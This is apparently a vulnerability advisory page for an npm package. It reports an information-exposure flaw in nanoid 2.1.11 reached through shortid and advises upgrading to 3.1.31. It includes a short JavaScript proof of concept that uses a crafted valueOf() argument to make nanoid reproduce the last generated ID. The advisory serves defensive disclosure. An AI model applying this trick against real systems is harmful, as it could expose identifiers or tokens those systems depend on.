Vulnerabilities

1 via 1 paths

Dependencies

31

Source

npm

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0

medium severity
new

Information Exposure

  • Vulnerable module: nanoid
  • Introduced through: @pushrocks/smartunique@3.0.3

Detailed paths

  • Introduced through: @pushrocks/lik@4.0.4 @pushrocks/smartunique@3.0.3 shortid@2.2.16 nanoid@2.1.11

Overview

Affected versions of this package are vulnerable to Information Exposure via the valueOf() function which allows to reproduce the last id generated.

PoC

import { nanoid } from 'nanoid';

const makeProxyNumberToReproducePreviousID = () => {
  let step = 0;
  return {
    valueOf() {
      // // if (!pool || pool.length < bytes) {
      if (step === 0) {
        step++;
        return 0;
      }

      // } else if (poolOffset + bytes > pool.length) {
      if (step === 1) {
        step++;
        return -Infinity;
      }

      // poolOffset += bytes
      if (step === 2) {
        step++;
        return 0;
      }

      return 21;
    },
  };
};

const ID1 = nanoid();
const ID2 = nanoid(makeProxyNumberToReproducePreviousID());
console.log({ ID1, ID2, isIDsEqual: ID1 === ID2 });

Remediation

Upgrade nanoid to version 3.1.31 or higher.

References